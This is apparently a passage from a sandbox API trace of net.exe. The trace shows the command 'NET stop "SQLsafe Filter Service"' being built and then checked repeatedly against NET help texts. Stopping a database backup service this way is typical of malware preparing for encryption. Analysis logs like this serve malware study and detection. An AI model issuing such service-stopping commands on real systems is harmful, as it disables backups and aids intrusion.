wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£SQLsafe", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe") returned 0x0 [0218.692] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe ") returned 0x0 [0218.692] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe ", _SizeInWords=0x200, _Source="Filter", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe Filter") returned 0x0 [0218.692] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe Filter", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe Filter ") returned 0x0 [0218.692] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe Filter ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥") returned 0x0 [0218.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5댸ë\x1dѰëɬ") returned 0xad [0218.692] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes ", _MaxCount=0x25) returned 18 [0218.692] LocalFree (hMem=0x355638) returned 0x0 [0218.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x2e [0218.692] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | ", _MaxCount=0x25) returned 16 [0218.692] LocalFree (hMem=0x355638) returned 0x0 [0218.692] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x7d [0218.692] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:t", _MaxCount=0x25) returned 16 [0218.692] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x26 [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r", _MaxCount=0x25) returned 16 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x19 [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x25) returned 16 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x1b [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x25) returned 13 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xbe [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text", _MaxCount=0x25) returned 12 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x33 [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET com", _MaxCount=0x25) returned 11 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x19 [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x25) returned 11 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xc1 [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:", _MaxCount=0x25) returned 7 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x16 [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x25) returned 3 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x33 [0218.693] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELET", _MaxCount=0x25) returned 15 [0218.693] LocalFree (hMem=0x355638) returned 0x0 [0218.693] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x234 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n share", _MaxCount=0x25) returned 12 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x13 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x16 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x11 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x12 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xf [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x17 [0218.694] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x25) returned 14 [0218.694] LocalFree (hMem=0x355638) returned 0x0 [0218.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x18 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x25) returned 14 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x2a [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER", _MaxCount=0x25) returned 14 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x25) returned 19 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x58 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN", _MaxCount=0x25) returned -1 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x184 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computer", _MaxCount=0x25) returned -2 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xc7 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [o", _MaxCount=0x25) returned -2 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x47 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | ", _MaxCount=0x25) returned -3 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xc2 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONF", _MaxCount=0x25) returned 19 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x319 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to st", _MaxCount=0x25) returned -5 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x483 [0218.695] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are", _MaxCount=0x25) returned -5 [0218.695] LocalFree (hMem=0x355638) returned 0x0 [0218.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xa86 [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names a", _MaxCount=0x25) returned 4 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x54 [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter ServiceΓÇ¥", _String2="\r\nFor more information on tools see t", _MaxCount=0x25) returned 97 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xad [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET ACCOUNTS\r\n[/FORCELOGOF", _MaxCount=0x1a) returned 18 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x2e [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET COMPUTER\r\n\\\\computerna", _MaxCount=0x1a) returned 16 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x7d [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET CONFIG SERVER\r\n[/AUTOD", _MaxCount=0x1a) returned 16 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x26 [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET CONFIG\r\n[SERVER | WORK", _MaxCount=0x1a) returned 16 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x19 [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 16 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x1b [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r", _MaxCount=0x1a) returned 13 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xbe [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET GROUP\r\n[groupname [/CO", _MaxCount=0x1a) returned 12 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x33 [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET HELP\r\ncommand\r\n -o", _MaxCount=0x1a) returned 11 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x19 [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1a) returned 11 [0218.696] LocalFree (hMem=0x355638) returned 0x0 [0218.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xc1 [0218.696] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET LOCALGROUP\r\n[groupname", _MaxCount=0x1a) returned 7 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x16 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 3 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x33 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET SESSION\r\n[\\\\computerna", _MaxCount=0x1a) returned 15 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x234 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1a) returned 12 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x13 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START BROWSER\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START MESSENGER\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START NET LOGON\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x16 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x11 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START RPCSS\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1a) returned 14 [0218.697] 